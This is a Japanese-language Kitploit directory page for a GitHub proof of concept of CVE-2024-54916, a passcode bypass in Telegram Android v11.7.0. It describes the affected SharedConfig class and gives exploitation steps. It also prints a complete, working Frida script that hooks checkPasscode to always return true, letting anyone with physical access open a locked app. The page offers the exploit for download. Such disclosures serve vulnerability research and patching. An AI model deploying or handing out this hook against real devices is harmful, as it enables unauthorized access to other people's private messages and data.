Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-54916 — Fridaベースの概念実証で、SharedConfig.checkPasscodeをフックして常にtrueを返すことでTelegram Androidの認証バイパスを実証し、不正アクセスを可能にする。 | Kitploit
ツール/GitHubGitHub/sahalll/cve-2024-54916
Androidセキュリティ動的分析 (サンドボックス)脆弱性分析エクスプロイトモバイルセキュリティバイナリ解析認証
GitHubsahalll/cve-2024-54916

CVE-2024-54916

Fridaベースの概念実証で、SharedConfig.checkPasscodeをフックして常にtrueを返すことでTelegram Androidの認証バイパスを実証し、不正アクセスを可能にする。

リポジトリを見る
51年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-54916: Telegram APKにおける認証バイパス

Telegram Android APK v.11.7.0のSharedConfigクラスにおける問題により、物理的に近接する攻撃者がcheckPasscodeメソッドの戻り値を操作することで認証をバイパスし、権限を昇格できる可能性があります。

脆弱性タイプ

認証バイパス

製品ベンダー

Telegram

影響を受ける製品コードベース

Telegram android apk v.11.7.0

影響を受けるコンポーネント

org.telegram.messenger.SharedConfig

悪用

対象クラスとメソッドの特定:

  • SharedConfigクラスは、パスコード検証のロジックを管理します。
  • このクラス内のcheckPasscodeメソッドは、入力されたパスコードの妥当性を判断する責任を持ちます。

Fridaを使用してメソッドをフックする

  • Fridaスクリプトを使用して、SharedConfigクラスのcheckPasscodeメソッドをフックします。メソッドの実装を常にtrueを返すように変更し、実際のパスコード検証をバイパスします。

実行

  • Fridaスクリプトはアプリの実行中(動的)に実行されます。ユーザーが入力したパスコードはすべて有効として受け入れられ、不正アクセスが可能になります。

POC

Java.perform(function() {

// Locate the SharedConfig class in the target application

var PassCodeActivity = Java.use('org.telegram.messenger.SharedConfig');

// Hook the checkPasscode method to modify its behavior

PassCodeActivity.checkPasscode.implementation = function(passcode) {

// Bypass the actual passcode check by always returning true

return true;

};

});

ビデオPOCリンク:-

https://drive.google.com/file/d/1-lW1IQiCyj-8UXZOTedYPGPhQwfMLX4M/view?usp=sharing

影響:-

この脆弱性はクライアント側の認証バイパスの問題です。パスコード機能に依存して機密データを保護したり、特定のアプリ機能へのアクセスを制限しているユーザーに影響を及ぼします。この欠陥を悪用することで、物理的に近接する攻撃者がパスコード検証プロセスを操作し、認証をバイパスしてアプリの保護領域への不正アクセスを取得する可能性があります。これにより、機密ユーザーデータの露出やアプリケーション内での不正な操作が発生する恐れがあります。

ツールをダウンロード